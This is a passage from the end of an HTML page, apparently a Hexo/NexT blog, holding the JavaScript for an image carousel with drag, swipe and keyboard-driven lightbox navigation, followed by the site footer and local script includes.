  container.addEventListener('touchstart', function(e) {
    startX = e.touches[0].clientX;
    startY = e.touches[0].clientY;
    isDragging = true;
    stopAuto();
    track.style.transition = 'none';
  }, { passive: true });

  container.addEventListener('touchmove', function(e) {
    if (!isDragging) return;
    var diffX = e.touches[0].clientX - startX;
    var diffY = e.touches[0].clientY - startY;
    if (Math.abs(diffX) > Math.abs(diffY)) {
      currentTranslate = prevTranslate + diffX;
      track.style.transform = 'translateX(' + currentTranslate + 'px)';
    }
  }, { passive: true });

  container.addEventListener('touchend', function(e) {
    if (!isDragging) return;
    isDragging = false;
    track.style.transition = 'transform 0.4s cubic-bezier(0.25, 0.46, 0.45, 0.94)';
    var diffX = e.changedTouches[0].clientX - startX;
    if (Math.abs(diffX) > 50) {
      if (diffX > 0 && current > 0) {
        prev();
      } else if (diffX < 0 && current < total - 1) {
        next();
      } else {
        goTo(current);
      }
    } else {
      goTo(current);
    }
    prevTranslate = -(current * container.offsetWidth);
    startAuto();
  });

  // Mouse drag support
  var mouseDown = false;
  container.addEventListener('mousedown', function(e) {
    mouseDown = true;
    startX = e.clientX;
    stopAuto();
    track.style.transition = 'none';
    e.preventDefault();
  });

  container.addEventListener('mousemove', function(e) {
    if (!mouseDown) return;
    var diffX = e.clientX - startX;
    currentTranslate = prevTranslate + diffX;
    track.style.transform = 'translateX(' + currentTranslate + 'px)';
  });

  container.addEventListener('mouseup', function(e) {
    if (!mouseDown) return;
    mouseDown = false;
    track.style.transition = 'transform 0.4s cubic-bezier(0.25, 0.46, 0.45, 0.94)';
    var diffX = e.clientX - startX;
    if (Math.abs(diffX) > 50) {
      if (diffX > 0 && current > 0) {
        prev();
      } else if (diffX < 0 && current < total - 1) {
        next();
      } else {
        goTo(current);
      }
    } else {
      goTo(current);
    }
    prevTranslate = -(current * container.offsetWidth);
    startAuto();
  });

  container.addEventListener('mouseleave', function() {
    if (mouseDown) {
      mouseDown = false;
      track.style.transition = 'transform 0.4s cubic-bezier(0.25, 0.46, 0.45, 0.94)';
      goTo(current);
      prevTranslate = -(current * container.offsetWidth);
      startAuto();
    }
  });

  window.addEventListener('resize', function() {
    prevTranslate = -(current * container.offsetWidth);
  });

  // Lightbox Logic
  var lightbox = document.getElementById('saberLightbox');
  var lightboxImg = document.getElementById('saberLightboxImg');
  var lightboxClose = document.getElementById('saberLightboxClose');
  var lightboxPrevBtn = document.getElementById('saberLightboxPrev');
  var lightboxNextBtn = document.getElementById('saberLightboxNext');
  var lightboxCounter = document.getElementById('saberLightboxCounter');
  var lightboxOverlay = lightbox.querySelector('.saber-lightbox-overlay');
  var lightboxCurrent = 0;
  var imgSources = Array.from(images).map(function(img) { return img.src; });

  function openLightbox(index) {
    lightboxCurrent = index;
    lightboxImg.src = imgSources[lightboxCurrent];
    updateLightboxCounter();
    updateLightboxArrows();
    lightbox.style.display = 'flex';
    document.body.style.overflow = 'hidden';
    // Force reflow
    lightbox.offsetHeight;
    lightbox.classList.add('active');
    stopAuto();
  }

  function closeLightbox() {
    lightbox.classList.remove('active');
    document.body.style.overflow = '';
    setTimeout(function() {
      lightbox.style.display = 'none';
      lightboxImg.src = '';
      startAuto();
    }, 300);
  }

  function updateLightboxCounter() {
    lightboxCounter.textContent = (lightboxCurrent + 1) + ' / ' + total;
  }

  function updateLightboxArrows() {
    lightboxPrevBtn.classList.toggle('disabled', lightboxCurrent === 0);
    lightboxNextBtn.classList.toggle('disabled', lightboxCurrent === total - 1);
  }

  function lightboxGoTo(index) {
    if (index < 0 || index >= total) return;
    lightboxCurrent = index;
    lightboxImg.style.opacity = '0.5';
    setTimeout(function() {
      lightboxImg.src = imgSources[lightboxCurrent];
      lightboxImg.style.opacity = '1';
      updateLightboxCounter();
      updateLightboxArrows();
    }, 150);
  }

  function lightboxNext() {
    if (lightboxCurrent < total - 1) {
      lightboxGoTo(lightboxCurrent + 1);
    }
  }

  function lightboxPrev() {
    if (lightboxCurrent > 0) {
      lightboxGoTo(lightboxCurrent - 1);
    }
  }

  // Click on gallery image to open lightbox
  container.addEventListener('click', function(e) {
    if (e.target.closest('.saber-gallery-arrow') || e.target.closest('.saber-gallery-dots')) return;
    openLightbox(current);
  });

  lightboxClose.addEventListener('click', closeLightbox);
  lightboxOverlay.addEventListener('click', closeLightbox);

  lightboxPrevBtn.addEventListener('click', function(e) {
    e.stopPropagation();
    lightboxPrev();
  });

  lightboxNextBtn.addEventListener('click', function(e) {
    e.stopPropagation();
    lightboxNext();
  });

  // Keyboard navigation
  document.addEventListener('keydown', function(e) {
    if (!lightbox.classList.contains('active')) return;
    if (e.key === 'Escape') {
      closeLightbox();
    } else if (e.key === 'ArrowLeft') {
      lightboxPrev();
    } else if (e.key === 'ArrowRight') {
      lightboxNext();
    }
  });

  // Swipe in lightbox
  var lbStartX = 0;
  lightbox.addEventListener('touchstart', function(e) {
    lbStartX = e.touches[0].clientX;
  }, { passive: true });

  lightbox.addEventListener('touchend', function(e) {
    var diffX = e.changedTouches[0].clientX - lbStartX;
    if (Math.abs(diffX) > 80) {
      if (diffX > 0) {
        lightboxPrev();
      } else {
        lightboxNext();
      }
    }
  }, { passive: true });

  // Initialize
  prevTranslate = 0;
  updateArrows();
  startAuto();
})();
</script>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2026</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">zhaochoudecat</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script size="300" alpha="0.6" zIndex="-1" src="/lib/canvas-ribbon/canvas-ribbon.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
